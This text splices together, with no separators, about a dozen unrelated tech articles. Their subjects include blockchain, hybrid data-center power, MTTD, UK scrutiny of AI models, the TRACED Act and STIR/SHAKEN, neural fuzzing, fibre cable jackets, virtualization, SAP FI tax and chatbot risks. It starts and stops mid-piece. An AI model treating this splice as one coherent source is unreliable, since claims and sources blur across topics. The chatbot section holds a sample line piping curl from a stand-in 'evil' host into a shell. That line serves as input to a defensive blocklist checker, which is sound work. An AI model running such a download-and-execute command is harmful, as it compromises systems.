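               for i in range(1, len(chain)))

print(verify(chain))                       # True
chain[1]["data"] = "alice pays bob 5000"   # tamper with one block
print(verify(chain))                       # False -- the later link breaks
```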
For years, blockchain and Bitcoin remained one and the same. About five years ago, innovators in the industry began to realize that, simply by altering the system, blockchain could be used for more than just securing cryptocurrency.
Indeed blockchain has proved extremely durable, standing up to some of the fiercest cyberattacks for almost a decade.
While the advantages of blockchain are clear, the system still has its drawbacks.
One risk of working on a blockchain based system is the danger of irreversibility. Because the protocols are so resistant to change, users could become permanently locked out in the event that private keys are forgotten or otherwise lost.
The system also has issues with storage. Each block can contain no more than 1 MB of data. The system in its current form isn't particularly fast either, with the capacity to handle only seven transactions per second. This may make the system unsuitable for enterprises that need to sort through large quantities of data with speed.
Initial costs to integrate blockchain into an existing business, especially one that includes supply chain systems, may be prohibitively high for many companies.
It’s important to realize that blockchain is not impervious to attack. To date, there have been several instances of specialized attacks that have succeeded in overcoming Blockchain.
And having your blockchain hacked comes with an additional risk. Because such a system makes all pieces of data fundamentally integrated, a successful attack could spell the loss of a company's entire database.
In conclusion, companies need to assess the risks and benefits of going blockchain, and determine if the system is best for their business model. Adaptability, cost, and overall increases in security will be important factors in determining if Blockchain is a proper fit for your enterprise.
The global fight to minimise climate change is gaining momentum as more and more industries come aboard. With its commitment to achieving carbon neutrality by 2030, and to reaching 75 percent of this goal as early as 2025, the data center industry is at the forefront. With the first milestone barely four years away, the clock is ticking, and data center operators need to find ways to achieve carbon neutrality.
Bridging the gap between reliability and sustainability
Increasing the use of renewables in power systems is an obvious way of reducing data center climate impact.
Renewables have come a long way in recent years and are now mature, efficient, and competitive. However, their inherently unstable nature runs counter to the need for uninterrupted power in a data center. To put it very simply, you can’t power a server rack from a PV panel on overcast days.
Fortunately, you do not have to choose between sustainability and reliability. With hybrid eco-systems, you can reduce climate impact while ensuring constant power. This is achieved by adding and prioritising renewables but backing them up with other power sources, and by running those (typically fossil-fuelled) power sources more efficiently, thereby lowering fuel consumption and reducing climate impact.
What is a hybrid eco-system?
Hybrid power is a solution covering a given load demand using a combination of two or more different power sources.
The operator can combine the connected sources as needed to exploit their benefits and reach different operational targets. When renewables are included in a hybrid solution, it is often called an eco-system.
Examples of hybrid eco-systems include a wind or PV plant with a battery energy storage system (BESS), or a setup that combines many power sources: mains power, gensets, several renewables, and BESS.
Flexible by nature, hybrid eco-systems are ideally suited for reducing climate impact because you can configure them to run in a climate-friendly way. For example, they can be set up to use renewable power sources whenever possible, relying on mains or diesel gensets only for backup.
How do you set up and control a hybrid eco-system?
With several different power sources and many possible operating scenarios, the control solution for a hybrid eco-system needs to be intelligent, quick-reacting, and flexible. In order to guarantee uninterrupted uptime, it must also be designed for resilience with full redundancy.
At DEIF, we recommend controlling hybrid eco-systems using an intelligent power management system (PMS) with interconnected controllers capable of handling all the different power sources, and of retaining system control even if a controller fails.
We offer a complete range of compatible controllers that can be combined and connected as desired: AGC-4 Mk II genset and mains controllers and ASC-4 sustainable controllers, capable of handling renewables such as PV panels and turbines plus BESSes.
When combined in an intelligent PMS, the controllers exchange information about the current load demand and the available power from the various sources.
They ensure that the load demand is met according to your requirements, for example by prioritising renewables. They also allow you to carry out other tasks, such as storing low-tariff mains power in a BESS for later use or running gensets at their optimal duty point.
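The prioritisation logic itself is conceptually simple. The Python sketch below is a deliberate simplification (a real PMS also handles ramp rates, spinning reserve, battery state of charge, and failover), but it illustrates the merit-order idea of renewables first, then stored energy, then gensets:

```python
def dispatch(load_kw, pv_kw, bess_kw, genset_kw):
    """Toy merit-order dispatch for a hybrid eco-system."""
    plan = {"pv": min(load_kw, pv_kw)}          # use all available solar first
    remaining = load_kw - plan["pv"]
    plan["bess"] = min(remaining, bess_kw)      # then draw from the battery
    remaining -= plan["bess"]
    plan["genset"] = min(remaining, genset_kw)  # gensets cover the rest
    remaining -= plan["genset"]
    if remaining > 0:
        raise RuntimeError("load demand exceeds available capacity")
    return plan

# Overcast afternoon: little PV, battery partly charged, gensets on standby.
print(dispatch(load_kw=500, pv_kw=120, bess_kw=200, genset_kw=600))
# {'pv': 120, 'bess': 200, 'genset': 180}
```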
Advanced DEIF controllers require no programming. They come with factory logic that has been proven in many different critical power applications, and they only need to be configured for the specific application.
Designed for compatibility, they can quickly be reconfigured on the fly without any downtime, and the system can easily be expanded if more power sources are added to your hybrid eco-system as your requirements change.
Not all or nothing
This controller flexibility is great news if you were wondering whether going hybrid is an all-or-nothing proposition. With a DEIF PMS, you can make the transition at your own pace, expanding or reconfiguring your hybrid eco-systems as needed.
This means that getting started on the road to carbon neutrality is relatively easy. If you already have a reliable genset or mains-based power setup, for example, you can expand it with one or more renewables and DEIF controllers.
The transition to carbon-neutral data center power needs to happen, but it does not need to happen all at once.
With a reconfigurable, flexible, and intelligent DEIF PMS controlling your hybrid eco-system, you are free to chart your own course towards green data center operations.
For more details, download DEIF's free whitepaper, 'Achieving carbon neutrality with hybrid eco-systems' at deif.com.
Mean Time To Detect (MTTD), also known as Mean Time To Identify (MTTI), is one of the main key performance indicators in Incident Management. MTTD refers to the mean (average) amount of time it takes for the organization to discover or detect an incident: MTTD = (sum of the time between each incident's start and its detection) ÷ (number of incidents).
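As a quick illustration, here is the calculation in Python with made-up incident timestamps:

```python
from datetime import datetime

# (incident started, incident detected) -- illustrative values only
incidents = [
    (datetime(2023, 5, 1, 9, 0),   datetime(2023, 5, 1, 13, 0)),  # 4 h
    (datetime(2023, 5, 8, 2, 30),  datetime(2023, 5, 8, 3, 30)),  # 1 h
    (datetime(2023, 5, 20, 17, 0), datetime(2023, 5, 21, 0, 0)),  # 7 h
]

total_seconds = sum(
    (detected - started).total_seconds() for started, detected in incidents
)
mttd_hours = total_seconds / len(incidents) / 3600
print(f"MTTD: {mttd_hours:.1f} hours")  # MTTD: 4.0 hours
```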
A shorter MTTD means that users suffer from IT disruptions for less time than with a longer MTTD. Incident detection can come from people, such as end-users reporting a software outage, or from systems monitoring and management tools. Generally, IT organizations strive to detect an issue before an end-user does, to minimize the disruption it causes, but this is not always possible. The beginning of an issue should be recorded by affected IT equipment and the software programs that run on it. For example, a security intrusion could be tracked to a password entered on the breached system at a specific time. The MTTD KPI can help show if IT monitoring technologies collect sufficient data and cover the probable sources of incidents.
What does this mean for an SMB?
SMBs should strive for the lowest possible MTTD, and the best way to do this is to have strong cybersecurity measures in place. In order to stay secure, your company needs to take proactive measures to reduce its chances of being compromised by cyberattacks. CyberHoot recommends the following best practices to avoid, prepare for, and prevent damage from these attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene, to house unique 14+ character passwords for every account
- Require Governance Policies (WISP, Password, Acceptable Use, Information Handling, Incident Response, and VAMP)
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees on cybersecurity skills they need such as strong password hygiene and how to spot and avoid phishing attacks
- Test that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
What’s the Buzz About?
Have you ever wondered how much the government knows about the artificial intelligence models you interact with daily? According to The Financial Times, the British government is keen to understand the inner workings of large language models like OpenAI's ChatGPT and Google's LaMDA. However, tech companies are wary of sharing sensitive business information due to potential risks.
The UK government's interest in these AI models comes as part of an initiative to better anticipate the risks tied to such technology. It is particularly keen on understanding the "model weights" used by these companies. Model weights are the numerical parameters in a language model that determine the outcome of AI computations.
OpenAI and other companies have so far not been required to disclose how their language models function. While the companies aren’t resisting this transparency, they caution that it’s a sensitive exercise fraught with security risks.
Why Bletchley Park?
In November, an AI summit will take place at Bletchley Park in the UK, a significant location known for its role in decoding messages during World War II. The summit will serve as a platform for politicians, academics, and AI company executives to discuss the use and potential regulation of artificial intelligence.
The Delicate Balance
So, what’s holding these companies back? According to a representative from the UK government, it’s not a matter of reluctance. Instead, the issue lies in the delicate nature of the technology and the numerous security risks that need to be considered. Earlier this year in June, companies like DeepMind, OpenAI, and Anthropic indicated a willingness to share more details with the UK government, but the extent of information to be disclosed remains unclear.
Questions Looming Ahead
You might ask, “What are the implications for the general public?” or “How will this affect the future of AI?” While the exact outcomes are uncertain, the UK government’s move could set a precedent for greater scrutiny and regulation of AI technology, which may have both positive and negative impacts.
The UK government is eager to delve into the mechanics of large language models like ChatGPT and LaMDA. Although tech companies are open to sharing, they are careful due to the inherent risks involved. The upcoming AI summit at Bletchley Park could be a pivotal moment for the future of AI regulation.
What is the TRACED Act?
The TRACED (Telephone Robocall Abuse Criminal Enforcement and Deterrence) Act is a piece of bipartisan legislation that was signed into law on December 31, 2019. The Act seeks to increase enforcement against telemarketers and scammers making illegal robocalls, and among other things, requires the FCC to establish a call authentication framework and mitigation criteria aimed at preventing the ultimate delivery of fraudulent calls to end-users.
History of the TRACED Act
Legislation intended to protect consumers from annoying and potentially predatory marketing began in 2003 with the FTC's Do Not Call List, but enforcement proved challenging. The abuse of technology that enables computerized autodialing has allowed nefarious robocallers to reach thousands of numbers with abusive and illegal pre-recorded messages, necessitating more robust federal legislation. As a result, the Pallone-Thune TRACED Act was passed by Congress in December 2019.
In a bipartisan effort to combat illegal robocalling, the TRACED Act passed the House of Representatives on December 4, 2019, the Senate on December 19, 2019, and was signed into law on December 31, 2019. Pursuant to this legislation, the FCC was required to develop and adopt rules requiring telecommunications providers to institute authentication protocols over the following 18 months. Additionally, the TRACED Act requires the FCC to conduct an internal review of the effectiveness of the call authentication technologies required of providers every three years.
How does it work?
Pursuant to the TRACED Act, the FCC will require telecom providers to adopt a call authentication framework, or show reasonable progress towards adopting one, within the 18 months following passage. The call authentication framework that has been established is commonly referred to as STIR/SHAKEN, an acronym meaning Secure Telephone Identity Revisited and Signature-based Handling of Asserted Information Using toKENS. STIR/SHAKEN allows calls to be authenticated by a digital “signature” of the originating service provider and then passed unchanged through the telecom network to the terminating provider of the intended recipient.
The implementation of STIR/SHAKEN not only helps to prevent scammers from illegally spoofing a number (misidentifying themselves on caller ID), but it will also allow the FCC and other enforcement agencies to more readily identify the originating source of illegal robocalls. Tracing illegal calls back to their source is critical for the enforcement of the TRACED Act, and could serve as a powerful deterrent for would-be scammers and harassers. Additionally, call authentication is designed to help differentiate between illegal robocalls and legitimate automated calls such as school notifications by giving callers making legal use of autodialing technology an opportunity to clearly identify themselves and their traffic.
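Under the hood, the STIR side of the framework defines that signature as a signed JSON token known as a PASSporT, which carries the calling number, the called number, an attestation level, and an origination identifier for traceback. The sketch below, written with Python's PyJWT and cryptography libraries, is only a rough illustration of the token's shape; the numbers and certificate URL are invented, and real SHAKEN deployments involve governance authorities, certificate repositories, and carrier-grade infrastructure:

```python
import time, uuid
import jwt  # PyJWT
from cryptography.hazmat.primitives.asymmetric import ec

# The originating provider signs the call with its private key.
provider_key = ec.generate_private_key(ec.SECP256R1())

payload = {
    "attest": "A",                    # full attestation: provider vouches for the caller
    "orig": {"tn": "12025550142"},    # calling number (example)
    "dest": {"tn": ["12025550199"]},  # called number (example)
    "iat": int(time.time()),
    "origid": str(uuid.uuid4()),      # lets investigators trace the call's origin
}
headers = {
    "ppt": "shaken",
    "typ": "passport",
    "x5u": "https://cert.example.test/sp.pem",  # placeholder certificate URL
}

token = jwt.encode(payload, provider_key, algorithm="ES256", headers=headers)

# The terminating provider verifies the signature before completing the call.
claims = jwt.decode(token, provider_key.public_key(), algorithms=["ES256"])
print(claims["attest"], claims["orig"]["tn"])  # A 12025550142
```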
The goal of the TRACED Act is to facilitate more effective enforcement against illegal robocalling. A key tool in this multifaceted effort is to more readily distinguish legitimate calls from illegal calls by implementing an authentication framework. By cracking down on illegal robocalling, this legislation aims to reduce a tremendous nuisance, but more importantly, protect vulnerable populations from fraudulent telephone scams.
Microsoft Uses Neural Networks to Make Fuzz Tests Smarter
Neural fuzzing can help uncover bugs in software better than traditional tools, company says.
November 15, 2017
Microsoft has developed a new technique to test software for security flaws that uses deep neural networks and machine learning techniques to improve upon current testing approaches.
Early experiments with the new "neural fuzzing" method show that it can help organizations uncover bugs in software better than traditional fuzzing tests, according to Microsoft.
Fuzzing is an approach where security testers try to uncover commonly exploitable flaws in applications by targeting the software with deliberately malformed data—or inputs—to see if it will crash so they can investigate and fix the cause.
The effectiveness of these tests depends to a large extent on how well the malicious inputs are crafted. Generally, the more inputs you find that trigger crashes, the more application vulnerabilities you are likely to be able to identify and close.
Security testers can use a few different methods to generate the malicious or malformed input.
Microsoft's approach improves on one method that uses data from previous fuzz tests as feedback for creating new mutations or tests. The approach involves a "learning technique that uses neural networks to learn patterns in the input files from past fuzzing explorations to guide future fuzzing explorations," according to Microsoft.
"The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information," the company said.
Neural networks are computing systems loosely modeled on the human brain that can autonomously learn from observed data. Many modern applications such as face and voice recognition and weather prediction use such networks.
Microsoft has implemented the new technique in American Fuzzy Lop (AFL), an open-source fuzzer that uses observed behavior from previous fuzzing executions to guide future tests. Researchers from the company tested the method on four target programs using parsers for the ELF, XML, PNG and PDF file formats.
The results were "very encouraging," Microsoft Development Lead William Blum said in a blog Monday. "We saw significant improvements over traditional AFL in terms of code coverage, unique code paths and crashes for the four input formats, " he said.
For instance, for the ELF parser, the neural AFL reported more than 20 crashes compared to zero with the traditional AFL fuzzer. Similarly, the neural AFL found 38% more crashes than traditional AFL for text-based file formats such as XML.
"This is astonishing given that neural AFL was trained on AFL itself," Blum said. The only area where the neural AFL did not perform as well was with PDF format, likely because of the large size of the files.
"AFL is essentially a mutational fuzzer that uses feedback from the target software to determine how the test cases are mutated," says Jonathan Knudsen, Security Strategist at Synopsys. "Microsoft has modified the feedback mechanism with a neural network."
The challenge with any fuzzing lies in finding the finite set of malformed inputs that are most likely to trigger bugs, Knudsen says. "Microsoft has modified how AFL chooses its inputs in a way that gave them better code coverage and more bugs for a couple of applications."
Moreno Carullo, co-founder and chief technical officer of Nozomi Networks says Microsoft has broken new ground with this technique. "It is absolutely a new [and] innovative approach," Carullo says.
"Neural fuzzing increases the speed of fuzzing as a test method and also finds more issues that cause a crash," he notes. The automation behind the approach can drastically reduce the time organizations require to test their software for security vulnerabilities. "Without this, it would take a team of heuristics experts a lot more time to discover the issues."
According to Blum, the capability that Microsoft has demonstrated only scratches the surface of what can be achieved using neural networks in fuzzing. "Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply," he said.
Fibre optic cable is being adopted as the most advanced communication medium by more and more users. Compared with copper cable, it supports better optical signal transmission of voice, data, video and more, and offers many other advantages. When purchasing fibre optic cables, you should look at the cable jacket first. So what information does the outer jacket convey? What type of cable jacket should you select? Read on to discover the secrets of the fibre cable jacket.
Fibre optic cable has a complicated construction, from the inner core, cladding, coating and strength members to the outer cable jacket. The core, made of plastic or glass, is the physical medium for optical signal transmission. As bare fibre can be easily broken, the outer cable jacket is needed to protect the fibre. The cable jacket is the first line of defense against moisture, mechanical damage, flame and chemicals. Without the jacket, fibre optic cables are very likely to be damaged during and after installation.
In most situations, a robust cable jacket is better because environments above or below ground can be harsh, so take the cable jacket seriously. There are many characteristics to consider: besides flexibility, the jacket should withstand very low and very high temperatures and offer good chemical and flame resistance. All these characteristics depend on the jacket material.
Cable jacket is made of various types of materials. As mentioned above, the cable jacket should stand the test of different environmental conditions, including the harsh temperature, the sun & the rain, chemicals, abrasion, and so on. The following shows several common cable jacket materials for your reference.
PE (Polyethylene)—PE is the standard jacket material for outdoor fibre optic cables. It has excellent properties of moisture and weather resistance. It also has the good electrical properties over a wide temperature range. Besides, it’s abrasion resistant.
PVC (Polyvinyl Chloride )—PVC is flexible and fire-retardant. It can be used as the jacket materials for both indoor and outdoor cables. PVC is more expensive than PE.
LSZH (Low Smoke Zero Halogen)—LSZH jacket is free of halogenated materials, which can be transformed into toxic and corrosive matter during combustion. LSZH materials are used to make a special cable called LSZH cable. LSZH cables produce little smoke and no toxic halogen compounds when they catch fire. Based on these benefits, LSZH cable is a good choice for indoor installations.
Fibre cable jacket colour depends on the cable type. Fibre cable comes in single-mode and multimode varieties. For single-mode fibre cable, the jacket colour is typically yellow. For multimode cable (for more details, see my blog What Are OM1, OM2, OM3 and OM4?), the jacket colour can be orange (OM1 and OM2 cable), aqua (OM3 cable) or purple (OM4 cable). For outside-plant cables, the jacket colour is black.
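If you track these conventions in tooling, a simple lookup table is enough. The sketch below encodes the colour codes just described; note that in practice OM4 jackets also appear in aqua or erika violet, so always confirm against the print on the cable itself.

```python
# Common jacket colours for indoor fibre cable types, as described above;
# outside-plant cable is typically black regardless of fibre type.
JACKET_COLOURS = {
    "OS1/OS2 single-mode": "yellow",
    "OM1 multimode": "orange",
    "OM2 multimode": "orange",
    "OM3 multimode": "aqua",
    "OM4 multimode": "purple (erika violet)",
}

def jacket_colour(fibre_type: str) -> str:
    return JACKET_COLOURS.get(fibre_type, "unknown - check the cable print")

print(jacket_colour("OM3 multimode"))  # -> aqua
```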
Choosing a fibre optic cable depends on your application. Consider two aspects: jacket colour and jacket material. The jacket colour is not just for good looks; different colours indicate different fibre modes. Which suits you best, the yellow or the orange cable? You should know the colour codes well before buying. You should also weigh the installation requirements and the environmental or long-term requirements. Will your cables be installed inside or outside the building? Will they be exposed to a harsh environment for a long time? Answering these questions will help you decide which jacket material is best.
As a popular data transmission medium, fibre cable plays an important role in the communications field. To some degree, the success of a fibre link rests on choosing the right cable. How do you buy suitable fibre optic cable? This article has approached the question from the standpoint of the cable jacket; when selecting cable, many other factors still need to be considered. I hope you find the right fibre cable for your needs.
The 6 Types of Virtualization—Which Is Right for Your Organization?
Virtualization is a computing technology that transforms the functionality of physical hardware into virtual resources such as servers, applications, networks, and storage.
Nowadays, organizations of all sizes embrace virtualization to increase operational efficiency, minimize IT-related costs, and enhance security.
While this is a game-changer, some organizations are unaware of the various types of virtualization—and how they can benefit from them. To help you stay ahead, we've compiled everything you need to know in this article.
The 6 Types of Virtualization: How They Help Your Organization
Here are the six most common types of virtualization and how they can benefit your organization:
1. Application Virtualization
This virtualization technology lets users access a remote version of an app, even if it isn't installed on their device. Instead, the application is installed on a central server and delivered to end users on demand.
Virtualization makes it easier for organizations to maintain and update their applications. It enhances security and privacy, as only administrators can modify and control app permissions. With application virtualization, companies can make it easier for employees to work remotely by giving them access to critical applications.
2. Data Virtualization
Data virtualization is a modern approach to data integration that allows an organization’s users to view enterprise data from numerous systems in a single dashboard. This type of virtualization does not copy data, but rather makes it available to end users from a unified perspective.
With real-time access to enterprise information, organizations can track their performance quickly and make management decisions that are based on solid, comprehensive information.
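As a toy sketch of the unified-view idea, the following Python snippet (using pandas, with made-up CRM and ERP tables) computes a combined view on demand instead of copying data into a separate store:

```python
import pandas as pd

# Two source systems that would normally be queried separately.
crm = pd.DataFrame({"customer_id": [1, 2], "region": ["EMEA", "APAC"]})
erp = pd.DataFrame({"customer_id": [1, 2], "open_orders": [3, 7]})

# A "virtual" unified view: nothing is duplicated into a warehouse;
# the join is computed only when the dashboard asks for it.
def unified_view() -> pd.DataFrame:
    return crm.merge(erp, on="customer_id")

print(unified_view())
```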
3. Desktop Virtualization
This technology allows end users to simulate their desktop workstations from any computing device, regardless of location. This works similarly to application virtualization, but houses whole desktop environments instead of just applications.
Desktop virtualization is a key component of a digital workspace. It makes it easier for IT teams to manage company devices and reduces security risks associated with lost devices or compromised data.
4. Network Virtualization
Network virtualization synthesizes a network's physical and software components into a single software-based resource. It also entails dividing the network bandwidth into independent channels.
Because administrators can modify and control every network element without touching the underlying physical components, this technology creates an environment that is much easier to monitor and administrate.
5. Server Virtualization
Virtualizing a server entails partitioning one physical server into multiple virtual servers. These servers can run as separate machines, allowing organizations to run multiple operating systems using a single host. By doing so, they can reduce operational costs and enjoy faster deployment times.
Server virtualization also increases security by concealing the location of host servers.
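As a small example of what administration on a virtualized host can look like, this Python sketch uses the libvirt bindings (assuming a local QEMU/KVM hypervisor is available) to list the virtual servers sharing one physical machine:

```python
import libvirt  # pip install libvirt-python; requires a running libvirt daemon

# Connect to the local hypervisor and enumerate the virtual servers
# sharing this one physical host.
conn = libvirt.open("qemu:///system")
try:
    for dom in conn.listAllDomains():
        state = "running" if dom.isActive() else "stopped"
        print(f"{dom.name():20s} {state}")
finally:
    conn.close()
```

Creating and partitioning the guests themselves would be done with the same API or with management tooling built on top of it.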
6. Storage Virtualization
Organizations that create and store large amounts of data can benefit from storage virtualization. Instead of utilizing a hard drive, this solution enables organizations to store their data in the cloud or on a virtual server.
This technology makes it easier to organize, duplicate, and transfer enterprise data. Incorporating cloud virtualization in the IT environment can help organizations reduce costs associated with physical data storage—and improve their disaster recovery strategies.
Leverage the Power of Virtualization by Partnering with Data Networks
The combination of cloud computing and virtualization has created revolutionary solutions for organizations, enabling them to improve efficiency and create scalable systems. However, learning the types of virtualization technologies available is just the beginning—knowing which type you need and how to incorporate them into your organization is the real challenge. Let Data Networks assist you with this.
At Data Networks, we provide organizations of all sizes with tailored IT solutions to boost their systems' productivity, efficiency, and security.
Reach out today to learn how we can make a difference for your organization.
Welcome to the tutorial about SAP FI Tax functionality. This is an introductory tutorial about taxes in SAP FI included in our free SAP FI course. Learn about the high-level flow of processing of taxes in FI module of SAP ERP.
SAP Financial Accounting can be used to manage all types of taxes according to region or country requirements. In sub-modules of financial accounting, various tax functions can be utilized which include tax calculation, tax posting, tax adjustments and tax reporting. This tutorial will help the reader to have a helicopter view of SAP FI tax functionality and have a clear understanding of how tax components are linked. Below is a flowchart showing all components involved when a tax line item is being posted in financial accounting.
Different countries use different tax laws and calculation methods. Within a country, different regions can use different calculation rules and procedures; as a result, taxes are handled in SAP at the country level. When you make tax settings in SAP FI, you make them per country: a calculation procedure is defined and then assigned to a country.
A calculation procedure contains the specifications necessary for calculating and posting tax on sales or purchases, and it is assigned to a country. Calculation procedures contain tax types, better known as condition types; examples are input tax and output tax. The tax type defines the base amount on which the tax is calculated and the account key used for posting the tax. The calculation procedure also contains the calculation rule, for example whether the percentage is included in the base amount (A) or not included (I), and it specifies on which side of the account the tax amount is posted. Finally, the calculation procedure specifies whether the user is allowed to change the proposed tax amounts manually; percentages can be locked so that the user cannot change them.
SAP FI Tax Codes
Tax codes are defined as two-character codes, which can be alphanumeric, each representing a tax percentage rate. Tax codes are used to check that a manually entered tax amount is correct, or to calculate the tax on sales or purchases automatically. The tax code checks whether the account can be posted to with the specified tax code and also determines the tax account. Each tax code specifies whether it is for input tax or output tax; a tax code can belong to only one of the two categories, never both. A tax code can also be set to issue either an error or a warning if the manually entered tax amount differs from the automatically calculated one.
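To make the two calculation rules mentioned above concrete, here is an illustrative Python function (not SAP code; the 19% rate and the amounts are invented) showing how the tax amount is derived when the percentage is included in the base amount versus not included:

```python
def tax_amount(amount: float, rate: float, rule: str) -> float:
    """Gross-vs-net handling as described above (illustrative only).

    rule "I": percentage not included - amount is a net base,
              tax is simply rate% on top of it.
    rule "A": percentage included - amount is gross, so the tax
              portion must be backed out of it.
    """
    if rule == "I":
        return amount * rate / 100
    if rule == "A":
        return amount - amount / (1 + rate / 100)
    raise ValueError(f"unknown calculation rule {rule!r}")

print(round(tax_amount(1000.0, 19.0, "I"), 2))  # 190.0 on top of a net base
print(round(tax_amount(1190.0, 19.0, "A"), 2))  # 190.0 backed out of a gross amount
```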
SAP FI Tax Account Determination
When a transaction with tax is posted, a separate line item is created with the tax amount, and this line item is posted automatically. For the tax line item to be posted automatically to a tax account, some settings have to be made for tax account determination. For each tax code defined, a tax account is assigned so that the system automatically posts to that account when the tax code is used. The posting keys for debiting and crediting are also specified.
Assignment of Tax Category to General Ledger Accounts
When an expense or revenue account is being maintained in the company code segment allowed tax type or condition type has to be specified. For example, if input tax is selected, only input tax codes can be selected when posting to that account. Here it is possible to allow all types of tax codes to be selected when posting to the account.
Picking Tax Code at Document Entry
When a tax type is selected in the general ledger master record, a user cannot post to that account without entering a tax code. When the user drills down on the tax code field, all tax codes maintained for the country of the company code are displayed, and the user can choose the appropriate one.
Now that we have a clear understanding of how the SAP system processes tax, let's conclude with a summary of the tax logic. When a user selects a tax code, the system reads the tax type (condition type) to which the tax code is assigned. It then checks the master record of the general ledger account being posted to and verifies that the tax type is allowed for that account. If it is, the condition type reads the calculation procedure to which it is assigned; the country assigned to the calculation procedure is checked against the country of the company code, and the calculation rules are applied accordingly. Once the tax amount has been calculated according to the percentage set in the tax code, the amount is posted to the account assigned to the tax code.
Did you like this tutorial? Have any questions or comments? We would love to hear your feedback in the comments section below. It would be a big help for us, and hopefully something we can address as we improve our free SAP FI tutorials.
Dangers Posed by Modern Chatbots
ChatGPT is based on GPT, trained on big data to acquire fluency. Its ability to provide human-like answers rests on deep learning, which allows it to classify language and the meaning of sentences. Machine learning is then used to generate an appropriate response based on the data and information collected during training. The system therefore cannot understand or think in the human sense; it approximates texts it once learned. For this reason, answers may vary depending on the complexity of the question and the availability of relevant information.
Chatbots interact with humans. In dialogue, users may disclose sensitive data, for example when an AI-supported quote is to be created and customer-specific details are entered for this purpose. This data becomes accessible to the AI operator and could be misused.
However, self-learning systems can also use these inputs for further processing. If user A enters details about customer X, user B could receive those same details in response to a similar query.
Potential misuse ranges from copyright infringement to social engineering attacks to identity theft and extortion. For this reason, it is recommended to be very careful with sensitive requests. Personal, sensitive and customer-specific information should be avoided as much as possible. Companies should issue guidelines on how such systems may be handled. These guidelines can be based on those already issued for online translation services, for example.
Modern chatbots are trained on existing data sets. This allows them to acquire the relevant knowledge and respond to questions coherently, or at least appear confident in their answers. The quality and quantity of the source material largely determine the quality of the responses. Incorrect or manipulated material can lead to unwelcome effects: untruths can be spread, fueling the problem of fake news.
A long-term danger, and one that will grow steadily, is posed by feedback loops. What happens when chatbots are trained on data generated by chatbots? Faulty data is amplified and established by the systems as absolute truth.
Responses generated by chatbots must therefore always be checked to ensure that their content is correct, whether a short biography, a summary of a news report or a draft offer was generated. A plausibility check of this kind presupposes, of course, that the user of the system can understand and classify the content. Generating results is easy in each case; classifying them and assuring their quality requires extensive understanding.
A chatbot provider should provide an uncomplicated way to mark faulty dialogs as such and to be able to submit suggestions for changes. This way, the quality of the solution can be increased through the active cooperation of the users.
When training chatbots, the operators define the data set and, with it, the weighting of the individual statements. This is inevitably linked to a certain subjectivity. As a result, certain narratives can become very pronounced while others are marginalized. Problematic, offensive and discriminatory effects can be amplified.
When training chatbots, attention must be paid to the quality of the data set. The weighting of individual statements must be carefully worked out, with certain tendencies flagged or rigorously prevented. Unfiltered misogynistic and racist statements as well as the spreading of scurrilous conspiracy theories cannot bring any benefit.
Here, too, providers should provide appropriate functions for reporting problematic content in an uncomplicated manner. These should then be checked, adjusted or prevented in a moderation process.
Large manufacturers such as Microsoft and Google have come under pressure from ChatGPT and do not want to leave the worthwhile market to competitors without a fight. It can be observed that they seek to gain an advantage by partially reducing or completely abolishing their ethics teams. This may pay off commercially in the short term. In the long run, however, the decision will take its toll: with every problematic statement, a system loses trust and acceptance, which cannot easily be regained, as research on human-machine trust and trust establishment has shown.
Manipulating or compromising a chatbot can cause it to spread malware. This can happen, as with other applications, via vulnerabilities such as cross-site scripting or SQL injection. However, such an attack can also target the data set: if a chatbot is used to generate program code, manipulation could lead to malicious code being injected and output in dialogues that appear harmless.
Responses from chatbots must therefore always be controlled. Content checks must also be carefully implemented for code samples, to prevent generated code containing security vulnerabilities, or outright malicious code, from being executed in production environments.
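One simple (and deliberately incomplete) control for generated code is a static pass before anything runs. The Python sketch below parses generated source with the standard ast module and flags calls to a small, assumed blocklist of risky names; a real review pipeline would be far more thorough.

```python
import ast

# Names whose appearance in generated code should trigger human review.
SUSPICIOUS = {"eval", "exec", "system", "popen", "rmtree", "__import__"}

def flag_generated_code(source: str) -> list[str]:
    """Coarse static pass over chatbot-generated Python:
    parse it (never execute it) and report risky call names."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in SUSPICIOUS:
                findings.append(f"line {node.lineno}: call to {name}")
    return findings

print(flag_generated_code("import os\nos.system('curl http://evil | sh')"))
```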
It is not uncommon for a chatbot to come up with an answer that makes surprising sense; sometimes the opposite is true. Either way, users may feel the need to understand why a particular answer was chosen, but most systems lack this kind of transparency. Instead, it is up to the user to correctly classify and accept a dialogue. This lack of insight can lead to a certain dependence, especially when topics are discussed whose content and implications users cannot assess, or can assess only to a limited extent.
It must be a declared goal for developers of AI solutions that their products ship with a so-called verbose mode. The user must always have the possibility to demand an explanation for a result. For chatbots, a simple solution is to allow the user to ask a why question: Why did you give this answer? It is then up to the chatbot to show the derivation of the result, to give some degree of confidence in its own approach. Unfortunately, current solutions are still far from offering mechanisms of this kind.
As with any technology, there are risks associated with its use. It is therefore critical that developers and users are aware of these risks and seek appropriate measures to ensure the security and privacy of data and information shared by chatbots.
Overall, AI-based chatbots in mass now offer exciting possibilities for human-machine interaction. But it remains important to approach with skeptical optimism and prioritize the security of the system and its users.
To minimize risk, it is important to follow cybersecurity best practices. It is also crucial to maintain transparency and accountability in the development and deployment of chatbots, both with regard to ethical aspects and to the legal obligations arising from the EU AI Act. The EU's regulation of AI systems (which also affects anyone who wants to trade with the EU) may result in a general ban on text-generating systems, or in very high requirements being placed on operators, requirements that may be difficult to fulfill, in part for financial reasons.
For years we’ve heard from industry experts and business leaders about how the Internet of Things will change our daily lives and how we use technology.
Most people use these ‘things’ as they’re called, without realizing it. They include smart appliances which enable you to turn your lights on or off, or even wearable devices, such as smartwatches and fitness trackers.
And the IoT is proliferating firmly at the heart of the Edge. In simple terms, IoT devices gather sensor data and then share it by connecting to an IoT gateway or other Edge device, so the data can be sent to the cloud to be analyzed.
It’s not a recent term either.
